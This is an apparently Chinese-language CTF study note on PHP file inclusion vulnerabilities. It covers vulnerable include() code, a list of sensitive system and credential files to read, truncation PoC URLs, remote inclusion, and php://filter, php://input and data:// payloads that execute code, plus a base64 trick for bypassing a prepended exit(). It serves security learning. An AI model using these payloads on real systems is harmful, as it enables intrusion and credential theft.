一.php的包含函数

require()
require_once()
include()
include_once()
include和require区别主要是，include在包含的过程中如果出现错误，会抛出一个警告，程序继续正常运行；而require函数出现错误的时候，会直接报错并退出程序的执行。
而include_once()，require_once()这两个函数，与前两个的不同之处在于这两个函数只包含一次，适用于在脚本执行期间同一个文件有可能被包括超过一次的情况下，你想确保它只被包括一次以避免函数重定义，变量重新赋值等问题。
因为include()的特性，如果对传入参数没有正确限制则可以利用该函数进行针对文件的操作

二.一些敏感目录

windows：
c:\boot.ini // 查看系统版本
c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件
c:\windows\repair\sam // 存储Windows系统初次安装的密码
c:\ProgramFiles\mysql\my.ini // MySQL配置
c:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root密码
c:\windows\php.ini // php 配置信息
Linux：
/etc/passwd // 账户信息
/etc/shadow // 账户密码文件
/usr/local/app/apache2/conf/httpd.conf // Apache2默认配置文件
/usr/local/app/apache2/conf/extra/httpd-vhost.conf // 虚拟网站配置
/usr/local/app/php5/lib/php.ini // PHP相关配置
/etc/httpd/conf/httpd.conf // Apache配置文件
/etc/my.conf // mysql 配置文件
/var/log/nginx/access.log 访问nginx日志

三.类型

1.本地

1）无限制

<?php
show_source("file.php");
$file = $_GET['file'];
if ($file){
    include($file);
}
?>

对这段代码中，包含文件未作限制可以任意访问（?file=文件路径 即可）

2）有限制

eg：

<?php
show_source("_00.php");
$filename  = $_GET['filename'];
include($filename . ".html");
?>

代码中会强制你选择html文件，但可以通过以下方法截断
1.%00截断
条件：magic_quotes_gpc = Off 且php版本<5.3.4
poc：http://127.0.0.1/_00.php?filename=../../../../../../../flag.txt%00
2.路径长度截断（填充垃圾字符，本地复现未成功，但记录下方法）
条件：windows OS，点号需要长于256；linux OS 长于4096
Windows下目录最大长度为256字节，超出的部分会被丢弃；
Linux下目录最大长度为4096字节，超出的部分会被丢弃。
poc：http://127.0.0.1/_00.php？filename=test.txt/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././.

2.远程

条件：allow_url_fopen = On（是否允许打开远程文件）

      allow_url_include = On（是否允许include/require远程文件）

远程就是通过传参打开本地文件
eg: http://www.ctfs-wiki.com/FI/FI.php?filename=http://192.168.91.133/FI/php.txt
若有限制可使用：‘？’‘#’‘空格’进行截断

四.伪协议

1.罗列一下

伪协议是php中支持与封装的协议总和，包含很多类型，常见的有:
file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流（I/O streams）
zlib:// — 压缩流
data:// — 数据（RFC 2397）
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
k. ogg:// — 音频流
l. expect:// — 处理交互式的流
对于文件包含漏洞主要用到file://、php://、data://三种

2.file://伪协议

file://用于访问本地文件系统，读取本地文件，且不受allow_url_fopen与allow_url_include设置的影响，当不指定需要包含文件的绝对路径时，默认为该脚本同级路径。
类似于上文的文件读取
参数=file://文件路径

3.php://伪协议

1）php://filter可以获取指定文件源码。当它与包含函数结合时，php://filter流会被当作php文件执行。所以我们一般对其进行编码，让其不执行。从而导致 任意文件读取。

resource=<要过滤的数据流>
这个参数是必须的。它指定了你要筛选过滤的数据流。

read=<读链的筛选列表>
该参数可选。可以设定一个或多个过滤器名称，以管道符'|'分隔。

write=<写链的筛选列表>
该参数可选。可以设定一个或多个过滤器名称，以管道符'|'分隔。

<；两个链的筛选列表>
任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。

eg:
php://filter/read=convert.base64-encode/resource=index.php（此时会显示被base64编码的源码）
php://filter/resource=index.php(此时所选文件会被当做php执行)
几个常见过滤器：

字符串过滤器

该类通常以string开头，对每个字符都进行同样方式的处理。
string.rot13
一种字符处理方式，字符右移十三位。
string.toupper
将所有字符转换为大写。
string.tolower
将所有字符转换为小写。
string.strip_tags
这个过滤器就比较有意思，用来处理掉读入的所有标签，例如XML的等等。在绕过死亡exit大有用处。

转换过滤器（未包含convert.iconv下回整这个）

对数据流进行编码，通常用来读取文件源码。
convert.base64-encode 与convert.base64-decode
base64加密解密
convert.quoted-printable-encode 与 convert.quoted-printable-decode
可以翻译为可打印字符引用编码，使用可以打印的ASCII编码的字符表示各种编码形式下的字符。

这里插一点base64过滤器的用法

对于如下方代码
<?php
$content = '<?php exit(); ?>';
$content .= $_POST['txt'];
file_put_contents($_POST['filename'], $content);
我们在传入任何信息后前面都会拼接<?php exit(); ?>导致无法执行
因为base64特性只包含64字符相当于以下代码
<?php
$_GET['txt'] = preg_replace('|[^a-z0-9A-Z+/]|s', '', $_GET['txt']);
base64_decode($_GET['txt']);
除了其中字符其他都会被舍弃
这样的话<?()等都会被舍弃，于是剩下的字符就只有phpexit以及我们传入的字符了。由于base64是4个byte一组，可以在所传信息最前面再添加一个字符（例如要传‘flag’可以将flag进行base64加密后添加字符’a’即传‘aZmxhZw==’），过滤器会将’phpexitaZmxhZw==’用base64进行解码最后得到‘暞ƫZflag’此时就除掉了exit（），flag可以换成🐎用php：//filter当作php文件执行

更多绕过方法可见：file_put_content和死亡·杂糅代码之缘

2）php://input

php://input可以访问请求的原始数据的只读流，将post请求的数据当作php代码执行。当传入的参数可作为文件名打开时，可以将参数设为php://input,同时post想设置的文件内容，php执行时会将post内容当作文件内容。从而导致任意代码执行。
条件：

• allow_url_include：on

例如：
http://127.0.0.1/cmd.php?cmd=php://input
POST数据：<?php phpinfo()?>
注意：
当enctype="multipart/form-data"的时候 php://input` 是无效的
遇到file_get_contents()可以用php://input绕过。

4.data://

数据流封装器，以传递相应格式的数据。可以让用户来控制输入流，当它与包含函数结合时，用户输入的data://流会被当作php文件执行
示例：
1、data://text/plain,
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>

2、data://text/plain;base64,
http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

5.zip://

zip:// 可以访问压缩包里面的文件。当它与包含函数结合时，zip://流会被当作php文件执行。从而实现任意代码执行
注意：
1.zip://中只能传入绝对路径。
2.要用#分隔压缩包和压缩包里的内容，并且#要用url编码%23（即下述POC中#要用%23替换）
3.只需要是zip的压缩包即可，后缀名可以任意更改。
4.相同的类型的还有zlib://和bzip2://
示例

小结：

五.例题

攻防世界Web_php_include
源码如下
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
$page=str_replace("php://", "", $page);
}
include($page);
?>
很简单，但可以练习使用各种伪协议